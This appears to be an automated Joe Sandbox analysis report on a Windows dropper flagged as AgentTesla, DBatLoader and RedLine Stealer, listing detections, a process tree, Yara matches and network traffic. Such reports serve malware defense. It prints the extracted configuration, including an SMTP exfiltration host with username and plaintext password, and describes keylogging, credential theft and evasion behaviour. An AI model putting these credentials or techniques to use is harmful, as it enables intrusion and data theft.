Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Analysis ID:1380665
MD5:39ad433c9ba920e7fd0961c66ac7079e
SHA1:8a54961347eab2253e2004e33f399c4cd07c8577
SHA256:e1471b0576c26d33b4fda732a7e0aba43193849ef1de6bbcdd42e8724354dd00
Tags:exe
Infos:

Detection

AgentTesla, DBatLoader, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe (PID: 7048 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe MD5: 39AD433C9BA920E7FD0961C66AC7079E)
    • cmd.exe (PID: 6376 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7160 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • srcngmlC.pif (PID: 5660 cmdline: C:\Users\Public\Libraries\srcngmlC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Clmgncrs.PIF (PID: 6472 cmdline: "C:\Users\Public\Libraries\Clmgncrs.PIF" MD5: 39AD433C9BA920E7FD0961C66AC7079E)
    • srcngmlC.pif (PID: 6348 cmdline: C:\Users\Public\Libraries\srcngmlC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Clmgncrs.PIF (PID: 1028 cmdline: "C:\Users\Public\Libraries\Clmgncrs.PIF" MD5: 39AD433C9BA920E7FD0961C66AC7079E)
    • srcngmlC.pif (PID: 6164 cmdline: C:\Users\Public\Libraries\srcngmlC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}
SourceRuleDescriptionAuthorStrings
0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        Click to see the 69 entries
        SourceRuleDescriptionAuthorStrings
        8.2.srcngmlC.pif.400000.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          8.2.srcngmlC.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          12.2.srcngmlC.pif.3eeb5b90.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            12.2.srcngmlC.pif.3eeb5b90.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              12.2.srcngmlC.pif.3eeb5b90.8.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              Click to see the 128 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://oripam.xyzAvira URL Cloud: Label: malware
              Source: http://mail.oripam.xyzAvira URL Cloud: Label: malware
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFReversingLabs: Detection: 52%
              Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 70%
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeReversingLabs: Detection: 52%
              Source: C:\Users\Public\Libraries\netutils.dllJoe Sandbox ML: detected
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFJoe Sandbox ML: detected
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeJoe Sandbox ML: detected

              Compliance

              barindex
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 5.2.srcngmlC.pif.400000.2.unpack
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 8.2.srcngmlC.pif.400000.1.unpack
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 12.2.srcngmlC.pif.400000.3.unpack
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr
              Source: Binary string: easinvoker.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: _.pdb source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029D5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029D5C18

              Networking

              barindex
              Source: DNS query: mail.oripam.xyz
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2BB38 InternetCheckConnectionA,0_2_02A2BB38
              Source: global trafficTCP traffic: 192.168.2.4:49733 -> 185.56.136.50:587
              Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
              Source: Joe Sandbox ViewIP Address: 185.56.136.50 185.56.136.50
              Source: Joe Sandbox ViewIP Address: 173.231.16.75 173.231.16.75
              Source: Joe Sandbox ViewASN Name: SECUREDSERVERS-EU SECUREDSERVERS-EU
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: global trafficTCP traffic: 192.168.2.4:49733 -> 185.56.136.50:587
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, 